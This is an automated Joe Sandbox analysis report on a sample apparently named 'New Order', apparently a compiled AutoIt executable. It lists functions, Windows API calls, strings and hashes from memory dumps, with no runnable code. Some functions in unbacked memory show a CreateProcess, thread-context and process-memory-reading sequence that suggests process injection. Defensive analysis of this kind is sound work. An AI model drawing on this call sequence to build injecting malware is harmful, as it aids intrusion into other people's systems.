CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00332C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00332CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00332CC0

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: fabaca6e87994dc2d88724ac19b6767026d5b91501398f35afd997e7cb4611c0
Instruction ID: 6666dc907d084c083cab53178e1732cd9812fe644df6e31b22ebf7866ef35d10
Opcode Fuzzy Hash: fabaca6e87994dc2d88724ac19b6767026d5b91501398f35afd997e7cb4611c0
Instruction Fuzzy Hash: 1AB16F71D10229ABDF12DFA4CC85EDFB77DEF08310F1041A6F609E6151EA31AA448F61

Function 002F5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JO,, xrefs: 002F5BA8, 002F5C6C

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: JO,
API String ID: 0-3346394669
Opcode ID: 85dfa77088d9153cd3fa46170c32eb73c3f4ea6bb4c33d5b826af02e26801d8f
Instruction ID: 50ee122af0da37f006aa4076e51b411c4669bb14656f5546c412c0adf01ff78c
Opcode Fuzzy Hash: 85dfa77088d9153cd3fa46170c32eb73c3f4ea6bb4c33d5b826af02e26801d8f
Instruction Fuzzy Hash: 3B51F371930A2E9FCB119FA5C945FFEFBB8AF05394F14002AFB05A7291D77189218B61

Function 002C3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002C3B0F,SwapMouseButtons,00000004,?), ref: 002C3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002C3B0F,SwapMouseButtons,00000004,?), ref: 002C3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,002C3B0F,SwapMouseButtons,00000004,?), ref: 002C3B83

Strings

Control Panel\Mouse, xrefs: 002C3B3E

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 5d34a9792b221795de45333fc0cc68e5e9edfde22c8f5915259bd135042064d7
Instruction ID: dd204ccd800bcf1390cacecac59744a6dafc88158dfcdfed93be121f6f0e9809
Opcode Fuzzy Hash: 5d34a9792b221795de45333fc0cc68e5e9edfde22c8f5915259bd135042064d7
Instruction Fuzzy Hash: B81118B5520209FEDB21CFA5DC44EAEB7BCEF04759B108959A805D7120D2719E50DB60

Function 014C12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014C1ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014C1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014C1B13

Memory Dump Source

Source File: 00000000.00000002.1263038001.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14c0000_New Order.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction ID: 457ce8e3f5117395ec8edf46bb0e4c0cdf5d1baa709bea4ef582ce4a7b3c35e1
Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction Fuzzy Hash: 9B620A34A14218DBEB64DFA4C850BDEB372EF58B00F1091A9D10DEB3A1E7759E81CB59

Function 002C3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003033A2

Part of subcall function 002C6B57: _wcslen.LIBCMT ref: 002C6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 002C3A04

Strings

Line: , xrefs: 003033EB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 3c4dcecfd71d2aef84bd9ea8cc76630ef36d1211f4a35200125e6ac2ac0fcd26
Instruction ID: 132f30ff62334a574ca25d5bfd8ec1d64350395667da4bfd3673aea126ab0c71
Opcode Fuzzy Hash: 3c4dcecfd71d2aef84bd9ea8cc76630ef36d1211f4a35200125e6ac2ac0fcd26
Instruction Fuzzy Hash: FF31D671528341AAD722EB20DC85FEBB7ECAF40714F004B5EF59993191DB709A68CBC2

Function 002C2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00302C8C

Part of subcall function 002C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C3A97,?,?,002C2E7F,?,?,?,00000000), ref: 002C3AC2

Part of subcall function 002C2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002C2DC4

Strings

`e8, xrefs: 00302C85
X, xrefs: 00302C5A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e8
API String ID: 779396738-2572068642
Opcode ID: 4c9114cbd6b57b3fa0fb987683d18e984b0d27e8959a968c35647d937ddf48f9
Instruction ID: 809361d266e968eeda017ec045f83e891c5bf8298c5d997ca35f1dced9f40ff0
Opcode Fuzzy Hash: 4c9114cbd6b57b3fa0fb987683d18e984b0d27e8959a968c35647d937ddf48f9
Instruction Fuzzy Hash: 9A219671A202589FDB02EF94C849BDE7BFC9F49314F00805DE405BB281DBB4595D8F61

Function 002DFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 002E0668

Part of subcall function 002E32A4: RaiseException.KERNEL32(?,?,?,002E068A,?,00391444,?,?,?,?,?,?,002E068A,002C1129,00388738,002C1129), ref: 002E3304

__CxxThrowException@8.LIBVCRUNTIME ref: 002E0685

Strings

Unknown exception, xrefs: 002E0692

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: dfee53e512a49704d122cea1d43dccc09f12a97c1399fd89d94632da8037dbf6
Instruction ID: 4df5d510d7ee1d558e795069ecc23b1e6c30b217a5f88e1cc479daeb76d0c85e
Opcode Fuzzy Hash: dfee53e512a49704d122cea1d43dccc09f12a97c1399fd89d94632da8037dbf6
Instruction Fuzzy Hash: C4F0A4249A028967CF00BA66D886D9E776D5E40310BE04571F91496591EFB1DA768A80

Function 00333017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0033302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00333044

Strings

aut, xrefs: 00333038

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 927f56367379d4e28ddc7af9eff47b491d4c1ae44ebe87d8148164512e4af9d2
Instruction ID: b770832f51ac77b6ab33667afe314b8fb0c828b1ea8147519eef1ed8c9b979c7
Opcode Fuzzy Hash: 927f56367379d4e28ddc7af9eff47b491d4c1ae44ebe87d8148164512e4af9d2
Instruction Fuzzy Hash: 02D05EB25003286BDE20A7A4AC4EFCB3A6CDB04755F0006A1B655E20A1EBB49984CBD0

Function 00347F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003482F5
TerminateProcess.KERNEL32(00000000), ref: 003482FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 003484DD

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 5c512159c065ef0d3d4cbb7ce6ee6daccc130643581097ec0ff4eb5d7007d97a
Instruction ID: 0a54e488a4d6bf237c7bedf2d607727c2808543b6c1b8288d2dfcc07f24c326e
Opcode Fuzzy Hash: 5c512159c065ef0d3d4cbb7ce6ee6daccc130643581097ec0ff4eb5d7007d97a
Instruction Fuzzy Hash: 47125971A083419FC725DF28C484B2ABBE5BF89318F15895DE8898B352DB31ED45CF92

Function 002C10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 002C1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002C1BF4
Part of subcall function 002C1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 002C1BFC
Part of subcall function 002C1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002C1C07
Part of subcall function 002C1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002C1C12
Part of subcall function 002C1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 002C1C1A
Part of subcall function 002C1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 002C1C22

Part of subcall function 002C1B4A: RegisterWindowMessageW.USER32(00000004,?,002C12C4), ref: 002C1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002C136A
OleInitialize.OLE32 ref: 002C1388
CloseHandle.KERNEL32(00000000,00000000), ref: 003024AB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: c3a43691a72ef16448bd1167655f5509499752f57c4a47eec6a7d83b8d94dfe8
Instruction ID: 3025a97e30b6114b5aa17655431907f2669f461bc451e96757ed8a182608bd30
Opcode Fuzzy Hash: c3a43691a72ef16448bd1167655f5509499752f57c4a47eec6a7d83b8d94dfe8
Instruction Fuzzy Hash: 4E71D0B98253038FC787DF7AA945A553AE8FB8A344B56422FD41AE7371E7324405CF44

Function 002F86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,002F85CC,?,00388CC8,0000000C), ref: 002F8704
GetLastError.KERNEL32(?,002F85CC,?,00388CC8,0000000C), ref: 002F870E
__dosmaperr.LIBCMT ref: 002F8739

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: ce9b5d8831a9a0193c15307b43c6b300e80974e6947dfeb1215837076eb4453b
Instruction ID: 434d82547bd7aadef7b4773a22b3be70928f135c468727cebab2492ec4883b26
Opcode Fuzzy Hash: ce9b5d8831a9a0193c15307b43c6b300e80974e6947dfeb1215837076eb4453b
Instruction Fuzzy Hash: EE016B33A34A381AD6656638684977EE78D4B827FDF390179FB04CB0D2DEA1CCD18690

Function 00332FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00332CD4,?,?,?,00000004,00000001), ref: 00332FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00332CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00333006
CloseHandle.KERNEL32(00000000,?,00332CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0033300D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 4b5e369da9644b8d831bc7c378fb05e25f5420b42e3f5aa08a6593df755dbe0d
Instruction ID: cf93bba33d35153a1b7b9d07f9849fe53947b76ad8645a0ac012a681ab458fbd
Opcode Fuzzy Hash: 4b5e369da9644b8d831bc7c378fb05e25f5420b42e3f5aa08a6593df755dbe0d
Instruction Fuzzy Hash: DAE0CD366907147BD2321765BC0DFCB3E1CD7C6F76F114210F719790E146A0160143E8

Function 002D1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002D17F6

Strings

CALL, xrefs: 002D17C6

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: ebc053c83fc8527d7edffb557b94715e4035e21ba8a0cb84ee3964cbe318f3ae
Instruction ID: 87ae32a055d2204a5ba6bc930cdcc44ad45607670e53d4ac558371afc3997fa7
Opcode Fuzzy Hash: ebc053c83fc8527d7edffb557b94715e4035e21ba8a0cb84ee3964cbe318f3ae
Instruction Fuzzy Hash: F122AA70618201AFC714DF14C481A6ABBF6BF89314F24891EF4968B7A1D771ECA5CF82

Function 00336EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00336F6B

Part of subcall function 002C4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00336F5A, 00336F63

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 6b4885d437268cf0f9043b0707135fa4d1b27f1e3f58386c24a0880a856a9d6a
Instruction ID: 618c951b6e063db6082c18ae49d9fad56fb5f2614e6a576febee0359783762dc
Opcode Fuzzy Hash: 6b4885d437268cf0f9043b0707135fa4d1b27f1e3f58386c24a0880a856a9d6a
Instruction Fuzzy Hash: 64B1A1711182019FCB15EF24C892E6FB7E5AF94304F048A5DF48697262DB30ED59CF92

Function 00332557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00332587

Strings

EA06, xrefs: 003325B9

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 15645e2c58142834c19b75de81b500b4828730710b359947a0f2765673ffd40b
Instruction ID: b958403fb80197296bb2f7a85d7e5f9f0f8b3b3e8b523be55cce23b8fce837e7
Opcode Fuzzy Hash: 15645e2c58142834c19b75de81b500b4828730710b359947a0f2765673ffd40b
Instruction Fuzzy Hash: 8701B5729442587EEF19C7A9C856EEEBBF89B05301F00459AF552D2181E5B4E7188B60

Function 002C3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 002C3908

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 21c9c0540859444f6a80327350c93f7344c61ba7386fa067a28c4b6a98e388a0
Instruction ID: 403a6b35a61fdf866f5d2ff79ab9beef85340c6639692a9941c2fb263c76177a
Opcode Fuzzy Hash: 21c9c0540859444f6a80327350c93f7344c61ba7386fa067a28c4b6a98e388a0
Instruction Fuzzy Hash: 2131D574514302CFD322DF24D895B97BBF8FB49308F000A2EF59993250E7B1AA54CB52

Function 014C129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014C1ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014C1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014C1B13

Memory Dump Source

Source File: 00000000.00000002.1263038001.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14c0000_New Order.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: 4f2c52f8ac0c5af564aeee0911f90bb34c337b255ad06d6be0d60de2d825e721
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: 1012BD24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A

Function 002C4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 002C4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,002C4EDD,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4E9C
Part of subcall function 002C4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002C4EAE
Part of subcall function 002C4E90: FreeLibrary.KERNEL32(00000000,?,?,002C4EDD,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4EFD

Part of subcall function 002C4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00303CDE,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4E62
Part of subcall function 002C4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002C4E74
Part of subcall function 002C4E59: FreeLibrary.KERNEL32(00000000,?,?,00303CDE,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4E87

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 4c0b74c379f8bb98061c7e9743d5c078696633a66ddad37fe6af6739ae0166a3
Instruction ID: 6da248065b77076ccd475ddcab08136e4b7aefb84258bba5c80111b87a95d9c2
Opcode Fuzzy Hash: 4c0b74c379f8bb98061c7e9743d5c078696633a66ddad37fe6af6739ae0166a3
